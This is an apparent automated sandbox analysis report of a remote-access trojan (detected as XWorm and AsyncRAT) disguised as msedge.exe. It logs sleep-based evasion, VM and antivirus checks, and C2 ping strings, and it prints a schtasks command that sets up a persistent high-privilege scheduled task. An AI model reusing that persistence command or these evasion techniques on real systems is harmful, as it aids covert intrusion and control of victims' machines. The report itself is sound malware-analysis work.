Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598713	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598607	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598482	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596283	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596163	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595909	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595612	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595470	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Window / User API: threadDelayed 3102			Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Window / User API: threadDelayed 6725			Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598713s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598607s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598482s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -598032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596283s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596163s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595909s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595612s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595470s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594907s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe TID: 4588	Thread sleep time: -593938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3428	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 3716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 1700	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe TID: 368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598713	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598607	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598482	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598157	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 598032	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596813	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596283	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596163	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595909	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595612	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595470	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594907	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594657	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594282	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Thread delayed: delay time: 593938	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.14.dr	Binary or memory string: vmci.syshbin`
Source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWiv%SystemRoot%\system32\mswsock.dll<workflowInstanceQueries>
Source: Amcache.hve.14.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\msedge.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"

Jump to behavior

Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager2y
Source: msedge.exe, 00000000.00000002.3551685304.0000000002AC3000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3551685304.0000000002E03000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@

Source: C:\Users\user\Desktop\msedge.exe	Queries volume information: C:\Users\user\Desktop\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Queries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: msedge.exe, 00000000.00000002.3550693887.0000000000BBD000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3561333873.000000001BA5E000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3563369376.000000001C0F3000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3550693887.0000000000AFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\msedge.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: msedge.exe, type: SAMPLE
Source: Yara match	File source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Scheduled Task/Job	2 Scheduled Task/Job	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	21 Registry Run Keys / Startup Folder	2 Scheduled Task/Job	111 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	13 Application Layer Protocol	Data Transfer Size Limits	Service Stop
